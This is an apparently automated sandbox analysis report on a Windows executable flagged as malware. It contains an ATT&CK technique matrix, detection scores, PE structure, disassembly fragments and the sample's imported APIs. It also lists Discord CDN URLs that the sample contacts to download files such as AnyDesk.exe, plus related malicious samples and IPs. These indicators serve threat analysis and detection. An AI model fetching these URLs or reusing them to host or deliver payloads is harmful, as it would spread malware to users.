Source: SecuriteInfo.com.FileRepMalware.14270.3068.exeBinary or memory string: WIN_8.1
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_000000014001E980 Shell_NotifyIconW,RemoveClipboardFormatListener,ChangeClipboardChain,DestroyWindow,IsWindow,DestroyWindow,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DestroyIcon,IsWindow,DestroyWindow,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DestroyIcon,DestroyIcon,IsWindow,DestroyWindow,DeleteObject,mciSendStringW,mciSendStringW,DeleteCriticalSection,OleUninitialize,free,free,free,0_2_000000014001E980
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_000000014001F410 AddClipboardFormatListener,PostMessageW,SetClipboardViewer,RemoveClipboardFormatListener,ChangeClipboardChain,0_2_000000014001F410
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_0000000140073910 RemoveClipboardFormatListener,ChangeClipboardChain,0_2_0000000140073910
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Native API
1
DLL Side-Loading
1
Exploitation for Privilege Escalation
1
Disable or Modify Tools
21
Input Capture
11
System Time Discovery
Remote Services1
Archive Collected Data
4
Ingress Tool Transfer
Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading
1
Deobfuscate/Decode Files or Information
LSASS Memory1
Account Discovery
Remote Desktop Protocol1
Screen Capture
11
Encrypted Channel
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
Access Token Manipulation
2
Obfuscated Files or Information
Security Account Manager2
File and Directory Discovery
SMB/Windows Admin Shares21
Input Capture
3
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
Process Injection
1
DLL Side-Loading
NTDS14
System Information Discovery
Distributed Component Object Model3
Clipboard Data
4
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Masquerading
LSA Secrets1
Query Registry
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Access Token Manipulation
Cached Domain Credentials141
Security Software Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
Process Injection
DCSync2
Process Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem11
Application Window Discovery
Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
System Owner/User Discovery
Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
SecuriteInfo.com.FileRepMalware.14270.3068.exe14%ReversingLabsWin64.Trojan.Nekark
SecuriteInfo.com.FileRepMalware.14270.3068.exe46%VirustotalBrowse
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://autohotkey.comCould0%URL Reputationsafe
https://autohotkey.comCould0%URL Reputationsafe
NameIPActiveMaliciousAntivirus DetectionReputation
cdn.discordapp.com
162.159.133.233
truefalse
    high
    NameMaliciousAntivirus DetectionReputation
    https://cdn.discordapp.com/attachments/946434985617944649/1187449788539613234/AnyDesk.exe?ex=6596edcb&is=658478cb&hm=1ccb90ac0e74e5fc5ff101f4716703308a02fb42540256a74e81a4d808fbe4ef&false
      high
      https://cdn.discordapp.com/attachments/946434985617944649/1187447469185974412/2img.png?ex=6596eba2&is=658476a2&hm=ceac553c8fa20a5a29d3a30fafcd5022ef44d33396c849d1a84b29a8507c87e5&false
        high
        https://cdn.discordapp.com/attachments/946434985617944649/1187447469743804447/1img.png?ex=6596eba2&is=658476a2&hm=0a3291a0428a9a3a412cccb212e697c45efde312d3ae0a17818b7bba37eb978d&false
          high
          https://cdn.discordapp.com/attachments/946434985617944649/1187447469492150292/3img.png?ex=6596eba2&is=658476a2&hm=e54785c353dcbe635c35016ed6a0babbb34588ac67d1176df058c308ee2bef44&false
            high
            NameSourceMaliciousAntivirus DetectionReputation
            https://cdn.discordapp.com/attachments/946434985617944649/1187447469492150292/3img.png?ex=6596eba2&iSecuriteInfo.com.FileRepMalware.14270.3068.exefalse
              high
              http://upx.sf.netAmcache.hve.0.drfalse
                high
                https://cdn.discordapp.com/attachments/946434985617944649/1187447469743804447/1img.png?ex=6596eba2&iSecuriteInfo.com.FileRepMalware.14270.3068.exefalse
                  high
                  https://cdn.discordapp.com/SecuriteInfo.com.FileRepMalware.14270.3068.exe, 00000000.00000003.2082580723.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.14270.3068.exe, 00000000.00000002.3328171326.0000000000951000.00000004.00000020.00020000.00000000.sdmpfalse
                    high
                    https://cdn.discordapp.com/attachments/946434985617944649/1187447469185974412/2img.png?ex=6596eba2&iSecuriteInfo.com.FileRepMalware.14270.3068.exefalse
                      high
                      https://autohotkey.comSecuriteInfo.com.FileRepMalware.14270.3068.exefalse
                        high
                        https://cdn.discordapp.com/attachments/946434985617944649/1187449788539613234/AnyDesk.exe?ex=6596edcSecuriteInfo.com.FileRepMalware.14270.3068.exefalse
                          high
                          https://autohotkey.comCouldSecuriteInfo.com.FileRepMalware.14270.3068.exefalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs
                          IPDomainCountryFlagASNASN NameMalicious
                          162.159.133.233
                          cdn.discordapp.comUnited States
                          13335CLOUDFLARENETUSfalse
                          Joe Sandbox version:40.0.0 Tourmaline
                          Analysis ID:1417368
                          Start date and time:2024-03-29 05:20:11 +01:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 4m 42s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:5
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:SecuriteInfo.com.FileRepMalware.14270.3068.exe
                          Detection:MAL
                          Classification:mal56.evad.winEXE@3/5@1/1
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:
                          • Successful, ratio: 98%
                          • Number of executed functions: 217
                          • Number of non-executed functions: 31
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                          • Report size exceeded maximum capacity and may have missing disassembly code.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          TimeTypeDescription
                          05:20:59API Interceptor1x Sleep call for process: SecuriteInfo.com.FileRepMalware.14270.3068.exe modified
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          162.159.133.233Cheat_Lab_2.7.2.msiGet hashmaliciousLummaC StealerBrowse
                          • cdn.discordapp.com/attachments/1175030470057136169/1175030979925135361/9
                          Cheat.Lab.2.7.1.msiGet hashmaliciousRedLineBrowse
                          • cdn.discordapp.com/attachments/1166694372084027482/1169541101917577226/2.txt
                          Cheat.Lab.2.7.1.msiGet hashmaliciousRedLineBrowse
                          • cdn.discordapp.com/attachments/1166694372084027482/1169541101917577226/2.txt
                          DHL_SHIPMENTS.exeGet hashmaliciousAsyncRAT, FormBookBrowse
                          • cdn.discordapp.com/attachments/1012640888754819173/1012643262537928734/DHL_SHIPMENTS_Olorqccl.bmp
                          SecuriteInfo.com.W32.FakeDoc.CY.genEldorado.18918.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                          • cdn.discordapp.com/attachments/956928735397965906/1006148111393116200/yXfZJqhIAtCWEPINOAX189.thn
                          64AE5410F978DF0F48DCC67508820EA230C566967E002.exeGet hashmaliciousDCRatBrowse
                          • cdn.discordapp.com/attachments/932607293869146142/941782821578633216/Sjxupcet.jpg
                          PO - Drawings And Specifications Sheet_pdf.scr.exeGet hashmaliciousAveMariaBrowse
                          • cdn.discordapp.com/attachments/472051232014598144/935778066171580456/Sjddks44.jpg
                          BFSdrqaAvS.exeGet hashmaliciousAmadey RedLineBrowse
                          • cdn.discordapp.com/attachments/878034206570209333/908436663947124756/slhost.exe
                          GR01DtRd0N.exeGet hashmaliciousVidarBrowse
                          • cdn.discordapp.com/attachments/575791168713916457/896907138390192158/ETH2.exe
                          update[1].exeGet hashmaliciousUnknownBrowse
                          • cdn.discordapp.com/attachments/870656611562180611/873962758427783228/4401fbad77d12fbc.dll
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          cdn.discordapp.comhttp://www.cyclic.sh/pricingGet hashmaliciousHTMLPhisherBrowse
                          • 162.159.130.233
                          BuThoFHNNK.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, SmokeLoaderBrowse
                          • 162.159.130.233
                          6uVlPQSJ4e.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, SmokeLoaderBrowse
                          • 162.159.129.233
                          SecuriteInfo.com.Win64.CrypterX-gen.24907.17990.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                          • 162.159.135.233
                          SecuriteInfo.com.Trojan.DownLoader32.59441.8119.31619.exeGet hashmaliciousUnknownBrowse
                          • 162.159.135.233
                          SecuriteInfo.com.Trojan.DownLoader32.59441.8119.31619.exeGet hashmaliciousUnknownBrowse
                          • 162.159.135.233
                          vHpxL6E2sQ.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, PureLog Stealer, SmokeLoaderBrowse
                          • 162.159.129.233
                          Tdkdsxz.exeGet hashmaliciousUnknownBrowse
                          • 162.159.135.233
                          Mtkfarukc.exeGet hashmaliciousUnknownBrowse
                          • 162.159.133.233
                          Cvdnacb.exeGet hashmaliciousUnknownBrowse
                          • 162.159.130.233
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          CLOUDFLARENETUShttps://1drv.ms/f/s!AsWd4BQz7qwJa8oeifBH2QA-eNgGet hashmaliciousHTMLPhisherBrowse
                          • 172.67.131.219
                          https://jpn104.z23.web.core.windows.net/werrx01USAHTML/?bcda=(0101)-88868-22952Get hashmaliciousTechSupportScamBrowse
                          • 172.67.208.186
                          https://jpn104.z23.web.core.windows.net/werrx01USAHTML/?bcda=(0101)-88868-24980Get hashmaliciousTechSupportScamBrowse
                          • 104.21.53.38
                          https://jpn104-secondary.z23.web.core.windows.net/werrx01USAHTML/?bcda=(0101)-88868-25074Get hashmaliciousTechSupportScamBrowse
                          • 104.21.53.38
                          https://jpn104-secondary.z23.web.core.windows.net/werrx01USAHTML/?bcda=(0101)-88868-24910Get hashmaliciousTechSupportScamBrowse
                          • 172.67.208.186
                          https://depl.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                          • 162.247.243.29
                          https://attwebupdate.w3spaces.com/Get hashmaliciousUnknownBrowse
                          • 172.67.8.174
                          https://8e1fd3fcd03b297a.pages.dev/robots.txtGet hashmaliciousHTMLPhisherBrowse
                          • 104.18.24.163
                          https://sdf37.z12.web.core.windows.net/werrx01USAHTML/?bcda=1-855-314-9082Get hashmaliciousTechSupportScamBrowse
                          • 172.67.208.186
                          https://oom21.z1.web.core.windows.net/werrx01USAHTML/?bcda=(0101)-88868-22952Get hashmaliciousTechSupportScamBrowse
                          • 172.67.208.186
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          37f463bf4616ecd445d4a1937da06e19file.exeGet hashmaliciousVidarBrowse
                          • 162.159.133.233
                          dVX6r5CyYY.exeGet hashmaliciousGuLoaderBrowse
                          • 162.159.133.233
                          assento 555 pro-Model-2.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                          • 162.159.133.233
                          awb_shipping_doc_23642.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                          • 162.159.133.233
                          TOMBIG - 9004898 - Ponuka#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                          • 162.159.133.233
                          ocrev ns.ordine 290520280324.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                          • 162.159.133.233
                          lista de cotizaciones del catalogo#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                          • 162.159.133.233
                          CANKO DMC IMPORT ENQUIRY.PDF.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                          • 162.159.133.233
                          Transaction Advice_280324-WS-394-1247.vbeGet hashmaliciousAgentTesla, GuLoaderBrowse
                          • 162.159.133.233
                          BuThoFHNNK.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, SmokeLoaderBrowse
                          • 162.159.133.233
                          No context
                          Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):36
                          Entropy (8bit):3.8537006129630296
                          Encrypted:false
                          SSDEEP:3:hGQRALjVLeJKuWJu:hCVLWqu
                          MD5:A1CA4BEBCD03FAFBE2B06A46A694E29A
                          SHA1:FFC88125007C23FF6711147A12F9BBA9C3D197ED
                          SHA-256:C3FA59901D56CE8A95A303B22FD119CB94ABF4F43C4F6D60A81FD78B7D00FA65
                          SHA-512:6FE1730BF2A6BBA058C5E1EF309A69079A6ACCA45C0DBCA4E7D79C877257AC08E460AF741459D1E335197CF4DE209F2A2997816F2A2A3868B2C8D086EF789B0E
                          Malicious:false
                          Reputation:low
                          Preview:This content is no longer available.
                          Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):36
                          Entropy (8bit):3.8537006129630296
                          Encrypted:false
                          SSDEEP:3:hGQRALjVLeJKuWJu:hCVLWqu
                          MD5:A1CA4BEBCD03FAFBE2B06A46A694E29A
                          SHA1:FFC88125007C23FF6711147A12F9BBA9C3D197ED
                          SHA-256:C3FA59901D56CE8A95A303B22FD119CB94ABF4F43C4F6D60A81FD78B7D00FA65
                          SHA-512:6FE1730BF2A6BBA058C5E1EF309A69079A6ACCA45C0DBCA4E7D79C877257AC08E460AF741459D1E335197CF4DE209F2A2997816F2A2A3868B2C8D086EF789B0E
                          Malicious:false
                          Reputation:low
                          Preview:This content is no longer available.
                          Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):36
                          Entropy (8bit):3.8537006129630296
                          Encrypted:false
                          SSDEEP:3:hGQRALjVLeJKuWJu:hCVLWqu
                          MD5:A1CA4BEBCD03FAFBE2B06A46A694E29A
                          SHA1:FFC88125007C23FF6711147A12F9BBA9C3D197ED
                          SHA-256:C3FA59901D56CE8A95A303B22FD119CB94ABF4F43C4F6D60A81FD78B7D00FA65
                          SHA-512:6FE1730BF2A6BBA058C5E1EF309A69079A6ACCA45C0DBCA4E7D79C877257AC08E460AF741459D1E335197CF4DE209F2A2997816F2A2A3868B2C8D086EF789B0E
                          Malicious:false
                          Reputation:low
                          Preview:This content is no longer available.
                          Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):36
                          Entropy (8bit):3.8537006129630296
                          Encrypted:false
                          SSDEEP:3:hGQRALjVLeJKuWJu:hCVLWqu
                          MD5:A1CA4BEBCD03FAFBE2B06A46A694E29A
                          SHA1:FFC88125007C23FF6711147A12F9BBA9C3D197ED
                          SHA-256:C3FA59901D56CE8A95A303B22FD119CB94ABF4F43C4F6D60A81FD78B7D00FA65
                          SHA-512:6FE1730BF2A6BBA058C5E1EF309A69079A6ACCA45C0DBCA4E7D79C877257AC08E460AF741459D1E335197CF4DE209F2A2997816F2A2A3868B2C8D086EF789B0E
                          Malicious:false
                          Reputation:low
                          Preview:This content is no longer available.
                          Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe
                          File Type:MS Windows registry file, NT/2000 or above
                          Category:dropped
                          Size (bytes):1835008
                          Entropy (8bit):4.465912815677086
                          Encrypted:false
                          SSDEEP:6144:8zZfpi6ceLPx9skLmb0fBZWSP3aJG8nAgeiJRMMhA2zX4WABluuNLjDH5S:CZHtBZWOKnMM6bFpZj4
                          MD5:2868578CC8CF8ED9771C63580BAE5FC5
                          SHA1:35EA3A9F2BA3AA1E383A5194F56DE6F68F3A19B3
                          SHA-256:8F60B93856DBB24B22D5F8FCB46ED71F262486762E697E10046B91F233582132
                          SHA-512:B3DCF644C2DDF2F884C2ADF4ABFF452509A2B3D3A9C452B2FB530C121BC352B48DB738171E89D8857A5D0A6875B8B64AEEFC48E9436AB52C40269E0043F5FDBC
                          Malicious:false
                          Reputation:low
                          Preview:regfH...H....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmf6..................................................................................................................................................................................................................................................................................................................................................P-..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                          File type:PE32+ executable (GUI) x86-64, for MS Windows
                          Entropy (8bit):6.395936475465321
                          TrID:
                          • Win64 Executable GUI (202006/5) 92.65%
                          • Win64 Executable (generic) (12005/4) 5.51%
                          • Generic Win/DOS Executable (2004/3) 0.92%
                          • DOS Executable Generic (2002/1) 0.92%
                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                          File name:SecuriteInfo.com.FileRepMalware.14270.3068.exe
                          File size:1'277'440 bytes
                          MD5:dfbaf344699830430ae052254168d580
                          SHA1:de616823f575b133c413bd497d30f8b19e71dce6
                          SHA256:51b0a985ab920e9f898b89bb10d3c5f6382179b046f3882a5697c1e2d8c88ba6
                          SHA512:1181d0076995a5b66fdf53368f4124d79877a4169ebf08bcfd3d5d7339f4a44d34b6372ce5dbc5ac67adee072b48a8f0b33fc568516618114802a8b3a0e89d4e
                          SSDEEP:24576:MdofGAmSIQ177wZ+A7MjiiRDXU/Sat5RgsLSmIOHsU5zMmX1xYwncqKvGqs2:MdofGbSIQ177wZvYjiiRDXASat5RgsL+
                          TLSH:05456C072391C0F4DF67E0B2CB26923AD6B5B41007289EDB55A0991EEF93ED05E3E752
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........C...C...C...XTX.v...XTY.....J.p.D...J.t.B...J.`.^...C.......XTm.T...XT\.h...XTi.B...XTn.B...RichC...........PE..d...v..d...
                          Icon Hash:9c1ed7912d2d3d0f
                          Entrypoint:0x1400cdb10
                          Entrypoint Section:.text
                          Digitally signed:false
                          Imagebase:0x140000000
                          Subsystem:windows gui
                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                          DLL Characteristics:
                          Time Stamp:0x64A8F376 [Sat Jul 8 05:26:14 2023 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:5
                          OS Version Minor:2
                          File Version Major:5
                          File Version Minor:2
                          Subsystem Version Major:5
                          Subsystem Version Minor:2
                          Import Hash:a649e6750bcf2911044dec744c57f40f
                          Instruction
                          dec eax
                          sub esp, 28h
                          call 00007FA33CACA82Ch
                          dec eax
                          add esp, 28h
                          jmp 00007FA33CAC4077h
                          int3
                          int3
                          dec eax
                          mov dword ptr [esp+08h], ebx
                          dec eax
                          mov dword ptr [esp+10h], ebp
                          dec eax
                          mov dword ptr [esp+18h], esi
                          push edi
                          dec eax
                          sub esp, 20h
                          dec eax
                          lea ebx, dword ptr [ecx+1Ch]
                          dec eax
                          mov ebp, ecx
                          mov esi, 00000101h
                          dec eax
                          mov ecx, ebx
                          inc esp
                          mov eax, esi
                          xor edx, edx
                          call 00007FA33CAC6E84h
                          inc ebp
                          xor ebx, ebx
                          dec eax
                          lea edi, dword ptr [ebp+10h]
                          inc ecx
                          lea ecx, dword ptr [ebx+06h]
                          inc ecx
                          movzx eax, bx
                          inc esp
                          mov dword ptr [ebp+0Ch], ebx
                          dec esp
                          mov dword ptr [ebp+04h], ebx
                          rep stosw
                          dec eax
                          lea edi, dword ptr [0004450Eh]
                          dec eax
                          sub edi, ebp
                          mov al, byte ptr [edi+ebx]
                          mov byte ptr [ebx], al
                          dec eax
                          inc ebx
                          dec eax
                          dec esi
                          jne 00007FA33CAC4215h
                          dec eax
                          lea ecx, dword ptr [ebp+0000011Dh]
                          mov edx, 00000100h
                          mov al, byte ptr [ecx+edi]
                          mov byte ptr [ecx], al
                          dec eax
                          inc ecx
                          dec eax
                          dec edx
                          jne 00007FA33CAC4215h
                          dec eax
                          mov ebx, dword ptr [esp+30h]
                          dec eax
                          mov ebp, dword ptr [esp+38h]
                          dec eax
                          mov esi, dword ptr [esp+40h]
                          dec eax
                          add esp, 20h
                          pop edi
                          ret
                          dec eax
                          mov eax, esp
                          dec eax
                          mov dword ptr [eax+10h], ebx
                          dec eax
                          mov dword ptr [eax+18h], esi
                          dec eax
                          mov dword ptr [eax+20h], edi
                          push ebp
                          dec eax
                          lea ebp, dword ptr [eax-00000488h]
                          dec eax
                          sub esp, 00000580h
                          dec eax
                          mov eax, dword ptr [000452BBh]
                          dec eax
                          xor eax, esp
                          Programming Language:
                          • [C++] VS2010 SP1 build 40219
                          • [ C ] VS2010 SP1 build 40219
                          • [ C ] VS2008 SP1 build 30729
                          • [IMP] VS2008 SP1 build 30729
                          • [ASM] VS2010 SP1 build 40219
                          • [RES] VS2010 SP1 build 40219
                          • [LNK] VS2010 SP1 build 40219
                          NameVirtual AddressVirtual Size Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IMPORT0x10e37c0x12c.rdata
                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x1310000x11f7c.rsrc
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x11f0000x7a58.pdata
                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IAT0xe00000xeb8.rdata
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                          .text0x10000xde3c60xde4001ba31dfbebc502f73fc1f1b9acfe88f6False0.5378201015888638data6.546634342198407IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          .rdata0xe00000x312de0x31400e44e67b79d5c560cd4370a176f824868False0.2806303537436548data4.969705518008835IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .data0x1120000xc3b80x50006b771dc1ff7332df436cc3b4bab43284False0.249560546875data3.309109498410039IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .pdata0x11f0000x7a580x7c007ad34a269fdb90eb2e3104d81b1922fbFalse0.4772555443548387data5.986236702358392IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          text0x1270000x258d0x2600c2225e974b892ae6322728534b6587c5False0.4644325657894737data5.770018591122181IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE
                          data0x12a0000x6ec00x70008f4275b626558a8640120f611553e570False0.47119140625data6.457359279664662IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .rsrc0x1310000x11f7c0x12000a688b42c760c98614d8c073daf44af4cFalse0.13850911458333334data3.9414219876204286IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          NameRVASizeTypeLanguageCountryZLIB Complexity
                          RT_ICON0x1313f80xfa18Device independent bitmap graphic, 120 x 258 x 32, image size 61920EnglishUnited States0.08687367237286017
                          RT_ICON0x140e100x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.6941489361702128
                          RT_ICON0x1412780x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.6622340425531915
                          RT_ICON0x1416e00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.6453900709219859
                          RT_ICON0x141b480x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishUnited States0.6655405405405406
                          RT_MENU0x141c700x2c8dataEnglishUnited States0.46207865168539325
                          RT_DIALOG0x141f380xe8dataEnglishUnited States0.6206896551724138
                          RT_ACCELERATOR0x1420200x48dataEnglishUnited States0.8194444444444444
                          RT_RCDATA0x1420680x79fASCII textEnglishUnited States0.3531522296258329
                          RT_GROUP_ICON0x1428080x14dataEnglishUnited States1.15
                          RT_GROUP_ICON0x14281c0x14dataEnglishUnited States1.25
                          RT_GROUP_ICON0x1428300x14dataEnglishUnited States1.25
                          RT_GROUP_ICON0x1428440x14dataEnglishUnited States1.25
                          RT_GROUP_ICON0x1428580x14dataEnglishUnited States1.25
                          RT_VERSION0x14286c0x21cdataEnglishUnited States0.49074074074074076
                          RT_MANIFEST0x142a880x4f4ASCII text, with very long lines (1268), with no line terminatorsEnglishUnited States0.4755520504731861
                          DLLImport
                          WSOCK32.dllgethostbyname, inet_addr, WSACleanup, gethostname, WSAStartup
                          WINMM.dllmixerGetLineInfoW, mixerGetDevCapsW, mixerOpen, mciSendStringW, joyGetPosEx, mixerGetLineControlsW, mixerGetControlDetailsW, mixerSetControlDetails, waveOutGetVolume, mixerClose, waveOutSetVolume, joyGetDevCapsW
                          VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                          COMCTL32.dllImageList_Create, CreateStatusWindowW, ImageList_ReplaceIcon, ImageList_GetIconSize, ImageList_Destroy, ImageList_AddMasked
                          PSAPI.DLLGetProcessImageFileNameW, GetModuleBaseNameW, GetModuleFileNameExW
                          WININET.dllInternetOpenW, InternetOpenUrlW, InternetCloseHandle, InternetReadFileExA, InternetReadFile
                          KERNEL32.dllGetModuleFileNameW, GetSystemTimeAsFileTime, FindResourceW, SizeofResource, LoadResource, LockResource, GetFullPathNameW, GetShortPathNameW, FindFirstFileW, FindNextFileW, FindClose, FileTimeToLocalFileTime, SetEnvironmentVariableW, Beep, MoveFileW, OutputDebugStringW, CreateProcessW, GetFileAttributesW, WideCharToMultiByte, MultiByteToWideChar, GetExitCodeProcess, WriteProcessMemory, ReadProcessMemory, GetCurrentProcessId, OpenProcess, TerminateProcess, SetPriorityClass, SetLastError, GetEnvironmentVariableW, GetLocalTime, GetDateFormatW, GetTimeFormatW, GetDiskFreeSpaceExW, SetVolumeLabelW, CreateFileW, DeviceIoControl, GetDriveTypeW, GetVolumeInformationW, GetDiskFreeSpaceW, GetCurrentDirectoryW, CreateDirectoryW, ReadFile, WriteFile, DeleteFileW, SetFileAttributesW, LocalFileTimeToFileTime, SetFileTime, DeleteCriticalSection, GetSystemTime, GetSystemDefaultUILanguage, GetComputerNameW, GetSystemWindowsDirectoryW, GetTempPathW, EnterCriticalSection, LeaveCriticalSection, VirtualProtect, QueryDosDeviceW, CompareStringW, RemoveDirectoryW, CopyFileW, GetCurrentProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, FormatMessageW, 